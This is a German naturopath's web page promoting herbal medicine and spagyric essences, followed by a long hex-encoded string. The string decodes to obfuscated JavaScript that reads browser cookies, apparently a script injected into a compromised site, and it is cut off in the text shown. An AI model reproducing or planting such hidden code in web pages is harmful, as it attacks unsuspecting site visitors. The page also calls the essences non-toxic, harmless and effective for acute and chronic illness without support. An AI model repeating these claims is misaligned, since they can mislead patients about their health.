Pflanzenheilkunde und Spagyrik

Gegen alles ist ein Kraut gewachsen. Schon von alters her wissen die Menschen um die heilkräftige Wirkung unserer Pflanzen. Diese fanden und finden in allen Kuluren und Zivilisationen Anwendung als Tee, Tinkturen, Salben, Auflagen und Pastillen. Eine Brücke zwischen Pflanzenheilkunde und Homöopathie stellt die Spagyrik dar. Die Spagyrik ist ein sehr altes Heilverfahren. Für die besondere Herstellung der Essenzen werden wildwachsende Heilpflanzen verwendet. Spagyrische Essenzen sind ungiftig und unschädlich. Durch den geringen Alkoholgehalt sind sie auch gut bei Kindern anzuwenden. Sie bewähren sich sowohl bei akuten als auch bei chronischen Krankheiten. Die Spagyrik aktiviert und unterstützt auf verschiedenen Ebenen Körper, Geist und Seele.. In Zusammenarbeit mit Apotheken, die mit spagyrischen Essenzen arbeiten, werden die von mir individuell zusammengestellten Mischungen für Sie hergestellt.
3_28_78_69_7c_70_28_42_28_2a_2a_31_43_15_12_85_15_12_6e_7d_76_6b_7c_71_77_76_28_4f_6d_7c_4b_77_77_73_71_6d_30_28_76_69_75_6d_28_31_28_83_15_12_28_7e_69_7a_28_7b_7c_69_7a_7c_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_71_76_6c_6d_80_57_6e_30_28_76_69_75_6d_28_33_28_2a_45_2a_28_31_43_15_12_28_7e_69_7a_28_74_6d_76_28_45_28_7b_7c_69_7a_7c_28_33_28_76_69_75_6d_36_74_6d_76_6f_7c_70_28_33_28_39_43_15_12_28_71_6e_28_30_28_30_28_29_7b_7c_69_7a_7c_28_31_28_2e_2e_15_12_28_30_28_76_69_75_6d_28_29_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_7b_7d_6a_7b_7c_7a_71_76_6f_30_28_38_34_28_76_69_75_6d_36_74_6d_76_6f_7c_70_28_31_28_31_28_31_15_12_28_83_15_12_28_7a_6d_7c_7d_7a_76_28_76_7d_74_74_43_15_12_28_85_15_12_28_71_6e_28_30_28_7b_7c_69_7a_7c_28_45_45_28_35_39_28_31_28_7a_6d_7c_7d_7a_76_28_76_7d_74_74_43_15_12_28_7e_69_7a_28_6d_76_6c_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_71_76_6c_6d_80_57_6e_30_28_2a_43_2a_34_28_74_6d_76_28_31_43_15_12_28_71_6e_28_30_28_6d_76_6c_28_45_45_28_35_39_28_31_28_6d_76_6c_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_7